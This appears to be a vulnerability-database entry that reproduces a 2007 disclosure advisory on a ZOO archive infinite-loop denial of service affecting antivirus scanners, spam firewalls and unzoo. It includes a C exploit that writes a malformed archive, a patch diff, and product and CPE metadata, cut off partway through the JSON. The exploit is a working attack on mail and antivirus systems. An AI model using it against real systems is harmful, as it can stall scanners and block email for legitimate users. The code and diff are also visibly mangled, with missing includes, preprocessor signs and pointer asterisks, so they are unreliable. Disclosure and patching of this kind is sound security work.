var-200705-0187
Vulnerability from variot
unzoo.c, as used in multiple products including AMaViS 2.4.1 and earlier, allows remote attackers to cause a denial of service (infinite loop) via a ZOO archive with a direntry structure that points to a previous file. The Zoo compression algorithm is prone to a remote denial-of-service vulnerability. This issue arises when applications implementing the Zoo algorithm process certain malformed archives. A successful attack can exhaust system resources and trigger a denial-of-service condition. This issue affects Zoo 2.10 and other applications implementing the vulnerable algorithm. Topic: Multiple vendors ZOO file decompression infinite loop DoS
Announced: 2007-05-04 Credits: Jean-Sebastien Guay-Leroux Products: Multiple (see section III) Impact: DoS (99% CPU utilisation) CVE ID: CVE-2007-1669, CVE-2007-1670, CVE-2007-1671, CVE-2007-1672, CVE-2007-1673
I. BACKGROUND
Zoo is a compression program and format developed by Rahul Dhesi in the mid 1980s. The format is based on the LZW compression algorithm and compressed files are identified by the .zoo file extension.
II. The vulnerability lies in the algorithm used to locate the files inside the archive. Each file in a ZOO archive is identified by a direntry structure. Those structures are linked between themselves with a 'next' pointer. This pointer is in fact an offset from the beginning of the file, representing the next direntry structure. By specifying an already processed file, it's possible to process more than one time this same file. The ZOO parser will then enter an infinite loop condition.
III. AFFECTED SOFTWARES
o Barracuda Spam Firewall o Panda Software Antivirus o avast! antivirus o Avira AntiVir o zoo-2.10 o unzoo.c o WinAce o PicoZip
IV. IMPACT
If this attack is conducted against a vulnerable antivirus, the host system will have its CPU at 100% utilization and may have problems answering other requests.
If this attack is conducted against an SMTP content filter running a vulnerable ZOO implementation, legitimate clients may be unable to send and receive email through this server.
V. SOLUTION
o Barracuda Spam Firewall - CVE-2007-1669: They fixed this problem in virusdef 2.0.6399 for firmware >= 3.4 and 2.0.6399o for firmware < 3.4 March 19th 2007.
o Panda Software Antivirus - CVE-2007-1670: They fixed this problem April 2nd 2007.
o avast! antivirus - CVE-2007-1672: They fixed this problem in version 4.7.981, April 14th 2007.
o Avira AntiVir - CVE-2007-1671: They fixed this problem in avpack32.dll version 7.3.0.6 March 22th 2007.
o zoo-2.10 - CVE-2007-1669: This software is not maintained anymore. A patch for version 2.10 is provided in section VII of this advisory because some SMTP content filters may still use this software.
o unzoo.c - CVE-2007-1673: This software is not maintained anymore. No patch is provided for this software.
o WinAce was contacted but no response was received from them.
o PicoZip was contacted but no response was received from them.
VI. PROOF OF CONCEPT
Using the PIRANA framework version 0.3.3, available at http://www.guay-leroux.com , it is possible to test your SMTP server against this vulnerability.
Alternatively, here is an exploit that will create a file that will trigger the infinite loop condition when it is processed.
/*
Exploit for the vulnerability: Multiple vendors ZOO file decompression infinite loop DoS
coded by Jean-S\xe9bastien Guay-Leroux September 2006
*/
include
include
include
// Structure of a ZOO header
define ZOO_HEADER_SIZE 0x0000002a
define ZH_TEXT 0
define ZH_TAG 20
define ZH_START_OFFSET 24
define ZH_NEG_START_OFFSET 28
define ZH_MAJ_VER 32
define ZH_MIN_VER 33
define ZH_ARC_HTYPE 34
define ZH_ARC_COMMENT 35
define ZH_ARC_COMMENT_LENGTH 39
define ZH_VERSION_DATA 41
define D_DIRENTRY_LENGTH 56
define D_TAG 0
define D_TYPE 4
define D_PACKING_METHOD 5
define D_NEXT_ENTRY 6
define D_OFFSET 10
define D_DATE 14
define D_TIME 16
define D_FILE_CRC 18
define D_ORIGINAL_SIZE 20
define D_SIZE_NOW 24
define D_MAJ_VER 28
define D_MIN_VER 29
define D_DELETED 30
define D_FILE_STRUCT 31
define D_COMMENT_OFFSET 32
define D_COMMENT_SIZE 36
define D_FILENAME 38
define D_VAR_DIR_LEN 51
define D_TIMEZONE 53
define D_DIR_CRC 54
define D_NAMLEN ( D_DIRENTRY_LENGTH + 0 )
define D_DIRLEN ( D_DIRENTRY_LENGTH + 1 )
define D_LFILENAME ( D_DIRENTRY_LENGTH + 2 )
void put_byte (char ptr, unsigned char data) { ptr = data; }
void put_word (char *ptr, unsigned short data) { put_byte (ptr, data); put_byte (ptr + 1, data >> 8); }
void put_longword (char *ptr, unsigned long data) { put_byte (ptr, data); put_byte (ptr + 1, data >> 8); put_byte (ptr + 2, data >> 16); put_byte (ptr + 3, data >> 24); }
FILE * open_file (char *filename) {
FILE *fp;
fp = fopen ( filename , "w" );
if (!fp) {
perror ("Cant open file");
exit (1);
}
return fp;
}
void usage (char *progname) {
printf ("\nTo use:\n");
printf ("%s <archive name>\n\n", progname);
exit (1);
}
int main (int argc, char argv[]) { FILE fp; char hdr = (char ) malloc (4096); char filename = (char ) malloc (256); int written_bytes; int total_size;
if ( argc != 2) {
usage ( argv[0] );
}
strncpy (filename, argv[1], 255);
if (!hdr || !filename) {
perror ("Error allocating memory");
exit (1);
}
memset (hdr, 0x00, 4096);
// Build a ZOO header
memcpy (hdr + ZH_TEXT, "ZOO 2.10 Archive.\032", 18);
put_longword (hdr + ZH_TAG, 0xfdc4a7dc);
put_longword (hdr + ZH_START_OFFSET, ZOO_HEADER_SIZE);
put_longword (hdr + ZH_NEG_START_OFFSET,
(ZOO_HEADER_SIZE) * -1);
put_byte (hdr + ZH_MAJ_VER, 2);
put_byte (hdr + ZH_MIN_VER, 0);
put_byte (hdr + ZH_ARC_HTYPE, 1);
put_longword (hdr + ZH_ARC_COMMENT, 0);
put_word (hdr + ZH_ARC_COMMENT_LENGTH, 0);
put_byte (hdr + ZH_VERSION_DATA, 3);
// Build vulnerable direntry struct
put_longword (hdr + ZOO_HEADER_SIZE + D_TAG, 0xfdc4a7dc);
put_byte (hdr + ZOO_HEADER_SIZE + D_TYPE, 1);
put_byte (hdr + ZOO_HEADER_SIZE + D_PACKING_METHOD, 0);
put_longword (hdr + ZOO_HEADER_SIZE + D_NEXT_ENTRY, 0x2a);
put_longword (hdr + ZOO_HEADER_SIZE + D_OFFSET, 0x71);
put_word (hdr + ZOO_HEADER_SIZE + D_DATE, 0x3394);
put_word (hdr + ZOO_HEADER_SIZE + D_TIME, 0x4650);
put_word (hdr + ZOO_HEADER_SIZE + D_FILE_CRC, 0);
put_longword (hdr + ZOO_HEADER_SIZE + D_ORIGINAL_SIZE, 0);
put_longword (hdr + ZOO_HEADER_SIZE + D_SIZE_NOW, 0);
put_byte (hdr + ZOO_HEADER_SIZE + D_MAJ_VER, 1);
put_byte (hdr + ZOO_HEADER_SIZE + D_MIN_VER, 0);
put_byte (hdr + ZOO_HEADER_SIZE + D_DELETED, 0);
put_byte (hdr + ZOO_HEADER_SIZE + D_FILE_STRUCT, 0);
put_longword (hdr + ZOO_HEADER_SIZE + D_COMMENT_OFFSET, 0);
put_word (hdr + ZOO_HEADER_SIZE + D_COMMENT_SIZE, 0);
memcpy (hdr + ZOO_HEADER_SIZE + D_FILENAME,
"AAAAAAAA.AAA", 13);
total_size = ZOO_HEADER_SIZE + 51;
fp = open_file (filename);
if ( (written_bytes = fwrite ( hdr, 1, total_size, fp)) != 0 ) {
printf ("The file has been written\n");
} else {
printf ("Cant write to the file\n");
exit (1);
}
fclose (fp);
return 0;
}
VII. PATCH
To fix this issue, ensure that the offset of the next file to process is always greater than the one you are currently processing. This will guarantee the fact that it's not possible to process the same files over and over again. Here is a patch for the software zoo version 2.10 distributed with many UNIX systems:
diff -u zoo/zooext.c zoo-patched/zooext.c --- zoo/zooext.c 1991-07-11 15:08:00.000000000 -0400 +++ zoo-patched/zooext.c 2007-03-16 16:45:28.000000000 -0500 @@ -89,6 +89,7 @@ #endif struct direntry direntry; / directory entry / int first_dir = 1; / first dir entry seen? / +unsigned long zoo_pointer = 0; / Track our position in the file /
static char extract_ver[] = "Zoo %d.%d is needed to extract %s.\n"; static char no_space[] = "Insufficient disk space to extract %s.\n"; @@ -169,6 +170,9 @@ exit_status = 1; } zooseek (zoo_file, zoo_header.zoo_start, 0); / seek to where data begins / + + / Begin tracking our position in the file / + zoo_pointer = zoo_header.zoo_start; }
#ifndef PORTABLE @@ -597,6 +601,12 @@ } / end if /
loop_again: + + / Make sure we are not seeking to already processed data / + if (next_ptr <= zoo_pointer) + prterror ('f', "ZOO chain structure is corrupted\n"); + zoo_pointer = next_ptr; + zooseek (zoo_file, next_ptr, 0); / ..seek to next dir entry / } / end while /
diff -u zoo/zoolist.c zoo-patched/zoolist.c --- zoo/zoolist.c 1991-07-11 15:08:04.000000000 -0400 +++ zoo-patched/zoolist.c 2007-03-16 16:45:20.000000000 -0500 @@ -92,6 +92,7 @@ int show_mode = 0; / show file protection / #endif int first_dir = 1; / if first direntry -- to adjust dat_ofs / +unsigned long zoo_pointer = 0; / Track our position in the file /
while (option) { switch (option) { @@ -211,6 +212,9 @@ show_acmt (&zoo_header, zoo_file, 0); / show archive comment / }
- / Begin tracking our position in the file /
- zoo_pointer = zoo_header.zoo_start; + / Seek to the beginning of the first directory entry / if (zooseek (zoo_file, zoo_header.zoo_start, 0) != 0) { ercount++; @@ -437,6 +441,11 @@ if (verb_list && !fast) show_comment (&direntry, zoo_file, 0, (char ) NULL); } / end if (lots of conditions) */ +
- / Make sure we are not seeking to already processed data /
- if (direntry.next <= zoo_pointer)
- prterror ('f', "ZOO chain structure is corrupted\n");
- zoo_pointer = direntry.next;
/* ..seek to next dir entry */ zooseek (zoo_file, direntry.next, 0);
VIII. CREDITS
Jean-Sebastien Guay-Leroux found the bug and wrote the exploit for it.
IX. REFERENCES
-
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1669
-
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1670
-
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1671
-
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1672
-
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1673
X. HISTORY
2006-09-?? : Vulnerability is found 2007-03-19 : All vendors notified 2007-03-19 : Barracuda Networks provided a fix 2007-03-22 : Avira provided a fix 2007-04-02 : Panda Antivirus provided a fix 2007-04-14 : avast! antivirus provided a fix 2007-05-04 : Public disclosure
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200705-0187",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "amavis",
"scope": "lte",
"trust": 1.8,
"vendor": "amavis",
"version": "2.4.1"
},
{
"model": "antivir personal",
"scope": "eq",
"trust": 1.6,
"vendor": "avira",
"version": "7"
},
{
"model": "antivir",
"scope": "eq",
"trust": 1.3,
"vendor": "avira",
"version": "6.35.00.00"
},
{
"model": "antivirus professional",
"scope": "eq",
"trust": 1.0,
"vendor": "avast",
"version": "4.0"
},
{
"model": "spam firewall",
"scope": "eq",
"trust": 1.0,
"vendor": "barracuda",
"version": "model_900"
},
{
"model": "spam firewall",
"scope": "eq",
"trust": 1.0,
"vendor": "barracuda",
"version": "model_400"
},
{
"model": "antivirus home",
"scope": "eq",
"trust": 1.0,
"vendor": "avast",
"version": "4.7.1098"
},
{
"model": "antivirus",
"scope": "lte",
"trust": 1.0,
"vendor": "avast",
"version": "4.7.980"
},
{
"model": "spam firewall",
"scope": "eq",
"trust": 1.0,
"vendor": "barracuda",
"version": "model_800"
},
{
"model": "antivirus home",
"scope": "eq",
"trust": 1.0,
"vendor": "avast",
"version": "4.7.844"
},
{
"model": "antivirus and firewall",
"scope": "eq",
"trust": 1.0,
"vendor": "panda",
"version": "2007"
},
{
"model": "antivirus home",
"scope": "eq",
"trust": 1.0,
"vendor": "avast",
"version": "4.6.691"
},
{
"model": "antivirus home",
"scope": "eq",
"trust": 1.0,
"vendor": "avast",
"version": "4.7.869"
},
{
"model": "antivirus professional",
"scope": "eq",
"trust": 1.0,
"vendor": "avast",
"version": "4.6.652"
},
{
"model": "zoo",
"scope": "lte",
"trust": 1.0,
"vendor": "rahul dhesi",
"version": "2.10"
},
{
"model": "antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "avast",
"version": "4.6.394"
},
{
"model": "antivirus home",
"scope": "eq",
"trust": 1.0,
"vendor": "avast",
"version": "4.6.665"
},
{
"model": "antivirus home",
"scope": "eq",
"trust": 1.0,
"vendor": "avast",
"version": "4.6"
},
{
"model": "picozip",
"scope": "eq",
"trust": 1.0,
"vendor": "picozip",
"version": "*"
},
{
"model": "antivir personal",
"scope": "eq",
"trust": 1.0,
"vendor": "avira",
"version": "*"
},
{
"model": "unzoo",
"scope": "eq",
"trust": 1.0,
"vendor": "unzoo",
"version": "4.4"
},
{
"model": "winace",
"scope": "eq",
"trust": 1.0,
"vendor": "winace",
"version": "*"
},
{
"model": "antivirus professional",
"scope": "eq",
"trust": 1.0,
"vendor": "avast",
"version": "4.7.1098"
},
{
"model": "antivirus professional",
"scope": "eq",
"trust": 1.0,
"vendor": "avast",
"version": "4.6.603"
},
{
"model": "antivirus home",
"scope": "eq",
"trust": 1.0,
"vendor": "avast",
"version": "4.7.827"
},
{
"model": "antivirus home",
"scope": "eq",
"trust": 1.0,
"vendor": "avast",
"version": "4.7.1043"
},
{
"model": "antivir personal",
"scope": "lte",
"trust": 1.0,
"vendor": "avira",
"version": "7.3.0.5"
},
{
"model": "antivir",
"scope": "eq",
"trust": 1.0,
"vendor": "avira",
"version": "7.04.00.23"
},
{
"model": "spam firewall",
"scope": "eq",
"trust": 1.0,
"vendor": "barracuda",
"version": "model_200"
},
{
"model": "antivirus professional",
"scope": "eq",
"trust": 1.0,
"vendor": "avast",
"version": "4.6.691"
},
{
"model": "antivirus professional",
"scope": "eq",
"trust": 1.0,
"vendor": "avast",
"version": "4.7.844"
},
{
"model": "antivirus professional",
"scope": "eq",
"trust": 1.0,
"vendor": "avast",
"version": "4.7.869"
},
{
"model": "spam firewall",
"scope": "eq",
"trust": 1.0,
"vendor": "barracuda",
"version": "model_100"
},
{
"model": "antivirus professional",
"scope": "eq",
"trust": 1.0,
"vendor": "avast",
"version": "4.6.665"
},
{
"model": "antivirus professional",
"scope": "eq",
"trust": 1.0,
"vendor": "avast",
"version": "4.6"
},
{
"model": "spam firewall",
"scope": "eq",
"trust": 1.0,
"vendor": "barracuda",
"version": "model_500"
},
{
"model": "antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "panda",
"version": "2007"
},
{
"model": "antivirus home",
"scope": "eq",
"trust": 1.0,
"vendor": "avast",
"version": "4.0"
},
{
"model": "antivir",
"scope": "eq",
"trust": 1.0,
"vendor": "avira",
"version": "*"
},
{
"model": "spam firewall",
"scope": "eq",
"trust": 1.0,
"vendor": "barracuda",
"version": "model_600"
},
{
"model": "antivirus professional",
"scope": "eq",
"trust": 1.0,
"vendor": "avast",
"version": "4.7.827"
},
{
"model": "antivirus professional",
"scope": "eq",
"trust": 1.0,
"vendor": "avast",
"version": "4.7.1043"
},
{
"model": "antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "avast",
"version": "4.7.700"
},
{
"model": "antivirus home",
"scope": "eq",
"trust": 1.0,
"vendor": "avast",
"version": "4.6.655"
},
{
"model": "antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "avast",
"version": "4.7.652"
},
{
"model": "spam firewall",
"scope": "eq",
"trust": 1.0,
"vendor": "barracuda",
"version": "model_300"
},
{
"model": "spam firewall",
"scope": "eq",
"trust": 1.0,
"vendor": "barracuda",
"version": "*"
},
{
"model": "antivirus home",
"scope": "eq",
"trust": 1.0,
"vendor": "avast",
"version": "4.6.652"
},
{
"model": "activescan",
"scope": "eq",
"trust": 0.6,
"vendor": "panda",
"version": "5.53"
},
{
"model": "antivir personal",
"scope": "eq",
"trust": 0.6,
"vendor": "avira",
"version": "7.3.0.5"
},
{
"model": "zoo",
"scope": "eq",
"trust": 0.3,
"vendor": "zoo",
"version": "2.10"
},
{
"model": "winace",
"scope": "eq",
"trust": 0.3,
"vendor": "winace",
"version": "2.605"
},
{
"model": "winace",
"scope": "eq",
"trust": 0.3,
"vendor": "winace",
"version": "2.5"
},
{
"model": "winace",
"scope": "eq",
"trust": 0.3,
"vendor": "winace",
"version": "2.60"
},
{
"model": "unzoo",
"scope": "eq",
"trust": 0.3,
"vendor": "unzoo",
"version": "4.4-2"
},
{
"model": "picozip",
"scope": "eq",
"trust": 0.3,
"vendor": "picozip",
"version": "4.0.2"
},
{
"model": "picozip",
"scope": "eq",
"trust": 0.3,
"vendor": "picozip",
"version": "4.0.1"
},
{
"model": "titanium antivirus antispyware",
"scope": "eq",
"trust": 0.3,
"vendor": "panda",
"version": "2006+"
},
{
"model": "titanium antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "panda",
"version": "2005"
},
{
"model": "platinum internet security",
"scope": "eq",
"trust": 0.3,
"vendor": "panda",
"version": "20070"
},
{
"model": "platinum internet security",
"scope": "eq",
"trust": 0.3,
"vendor": "panda",
"version": "2006"
},
{
"model": "antivirus platinum",
"scope": "eq",
"trust": 0.3,
"vendor": "panda",
"version": "2.0"
},
{
"model": "antivirus for netware",
"scope": "eq",
"trust": 0.3,
"vendor": "panda",
"version": "2.0"
},
{
"model": "activescan",
"scope": "eq",
"trust": 0.3,
"vendor": "panda",
"version": "5.54.1"
},
{
"model": "activescan",
"scope": "eq",
"trust": 0.3,
"vendor": "panda",
"version": "5.0"
},
{
"model": "networks barracuda spam firewall",
"scope": "eq",
"trust": 0.3,
"vendor": "barracuda",
"version": "3.3.15026"
},
{
"model": "networks barracuda spam firewall",
"scope": "eq",
"trust": 0.3,
"vendor": "barracuda",
"version": "3.1.18"
},
{
"model": "networks barracuda spam firewall",
"scope": "eq",
"trust": 0.3,
"vendor": "barracuda",
"version": "3.1.17"
},
{
"model": "networks barracuda spam firewall",
"scope": "eq",
"trust": 0.3,
"vendor": "barracuda",
"version": "3.3.03.055"
},
{
"model": "networks barracuda spam firewall",
"scope": "eq",
"trust": 0.3,
"vendor": "barracuda",
"version": "3.3.03.053"
},
{
"model": "networks barracuda spam firewall",
"scope": "eq",
"trust": 0.3,
"vendor": "barracuda",
"version": "3.3.03.022"
},
{
"model": "networks barracuda spam firewall",
"scope": "eq",
"trust": 0.3,
"vendor": "barracuda",
"version": "3.3.01.001"
},
{
"model": "networks barracuda spam firewall",
"scope": "eq",
"trust": 0.3,
"vendor": "barracuda",
"version": "3.3.0.54"
},
{
"model": "desktop for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "avira",
"version": "1.00.00.68"
},
{
"model": "antivir workstation professional build",
"scope": "eq",
"trust": 0.3,
"vendor": "avira",
"version": "367"
},
{
"model": "antivir personaledition premium build",
"scope": "eq",
"trust": 0.3,
"vendor": "avira",
"version": "228"
},
{
"model": "antivir personaledition classic build",
"scope": "eq",
"trust": 0.3,
"vendor": "avira",
"version": "180"
},
{
"model": "avast! linux home edition",
"scope": "eq",
"trust": 0.3,
"vendor": "avast",
"version": "1.0.5"
},
{
"model": "avast! linux home edition",
"scope": "eq",
"trust": 0.3,
"vendor": "avast",
"version": "1.0.5-1"
},
{
"model": "antivirus server edition",
"scope": "eq",
"trust": 0.3,
"vendor": "avast",
"version": "4.7.726"
},
{
"model": "antivirus server edition",
"scope": "eq",
"trust": 0.3,
"vendor": "avast",
"version": "4.7.676"
},
{
"model": "antivirus server edition",
"scope": "eq",
"trust": 0.3,
"vendor": "avast",
"version": "4.7.660"
},
{
"model": "antivirus server edition",
"scope": "eq",
"trust": 0.3,
"vendor": "avast",
"version": "4.6.566"
},
{
"model": "antivirus server edition",
"scope": "eq",
"trust": 0.3,
"vendor": "avast",
"version": "4.6.489"
},
{
"model": "antivirus server edition",
"scope": "eq",
"trust": 0.3,
"vendor": "avast",
"version": "4.6.460"
},
{
"model": "antivirus professional edition",
"scope": "eq",
"trust": 0.3,
"vendor": "avast",
"version": "4.7.844"
},
{
"model": "antivirus professional edition",
"scope": "eq",
"trust": 0.3,
"vendor": "avast",
"version": "4.7.827"
},
{
"model": "antivirus professional edition",
"scope": "eq",
"trust": 0.3,
"vendor": "avast",
"version": "4.6.691"
},
{
"model": "antivirus professional edition",
"scope": "eq",
"trust": 0.3,
"vendor": "avast",
"version": "4.6.665"
},
{
"model": "antivirus professional edition",
"scope": "eq",
"trust": 0.3,
"vendor": "avast",
"version": "4.6.652"
},
{
"model": "antivirus professional edition",
"scope": "eq",
"trust": 0.3,
"vendor": "avast",
"version": "4.6.603"
},
{
"model": "antivirus professional edition",
"scope": "eq",
"trust": 0.3,
"vendor": "avast",
"version": "4.6"
},
{
"model": "antivirus professional edition",
"scope": "eq",
"trust": 0.3,
"vendor": "avast",
"version": "4.0"
},
{
"model": "antivirus managed client",
"scope": "eq",
"trust": 0.3,
"vendor": "avast",
"version": "4.6.394"
},
{
"model": "antivirus managed client",
"scope": null,
"trust": 0.3,
"vendor": "avast",
"version": null
},
{
"model": "antivirus home edition",
"scope": "eq",
"trust": 0.3,
"vendor": "avast",
"version": "4.7.869"
},
{
"model": "antivirus home edition",
"scope": "eq",
"trust": 0.3,
"vendor": "avast",
"version": "4.7.844"
},
{
"model": "antivirus home edition",
"scope": "eq",
"trust": 0.3,
"vendor": "avast",
"version": "4.7.827"
},
{
"model": "antivirus home edition",
"scope": "eq",
"trust": 0.3,
"vendor": "avast",
"version": "4.6.691"
},
{
"model": "antivirus home edition",
"scope": "eq",
"trust": 0.3,
"vendor": "avast",
"version": "4.6.665"
},
{
"model": "antivirus home edition",
"scope": "eq",
"trust": 0.3,
"vendor": "avast",
"version": "4.6.655"
},
{
"model": "antivirus home edition",
"scope": "eq",
"trust": 0.3,
"vendor": "avast",
"version": "4.6.652"
},
{
"model": "antivirus home edition",
"scope": "eq",
"trust": 0.3,
"vendor": "avast",
"version": "4.6"
},
{
"model": "antivirus home edition",
"scope": "eq",
"trust": 0.3,
"vendor": "avast",
"version": "4.0"
}
],
"sources": [
{
"db": "BID",
"id": "23823"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-001745"
},
{
"db": "NVD",
"id": "CVE-2007-1673"
},
{
"db": "CNNVD",
"id": "CNNVD-200705-118"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:panda:panda_antivirus:2007:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:model_200:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:model_300:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:model_400:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:avira:antivir:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:avira:antivir_personal:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:avast:avast_antivirus:4.6.394:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:avast:avast_antivirus:4.7.652:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:avast:avast_antivirus_home:4.6.691:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:avast:avast_antivirus_home:4.7.1043:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:avast:avast_antivirus_home:4.7.844:*:windows:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:avast:avast_antivirus_home:4.7.869:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:avast:avast_antivirus_professional:4.6.691:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:avast:avast_antivirus_professional:4.7.1043:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:picozip:picozip:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:panda:panda_antivirus_and_firewall:2007:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:unzoo:unzoo:4.4:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:model_500:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:model_600:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:avira:antivir_personal:*:*:classic:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:avira:antivir_personal:*:*:premium:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:avast:avast_antivirus:4.7.700:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:avast:avast_antivirus:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "4.7.980",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:avast:avast_antivirus_home:4.7.1043:*:windows:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:avast:avast_antivirus_home:4.7.1098:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:avast:avast_antivirus_home:4.7.869:*:windows:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:avast:avast_antivirus_professional:4.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:avast:avast_antivirus_professional:4.7.1043:*:windows:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:avast:avast_antivirus_professional:4.7.1098:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:model_100:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:avira:antivir:6.35.00.00:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:avira:antivir:7.04.00.23:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:avira:antivir_personal:7:*:classic:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:amavis:amavis:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "2.4.1",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:avast:avast_antivirus_home:4.6.652:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:avast:avast_antivirus_home:4.6.655:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:avast:avast_antivirus_home:4.6.665:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:avast:avast_antivirus_home:4.7.827:*:windows:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
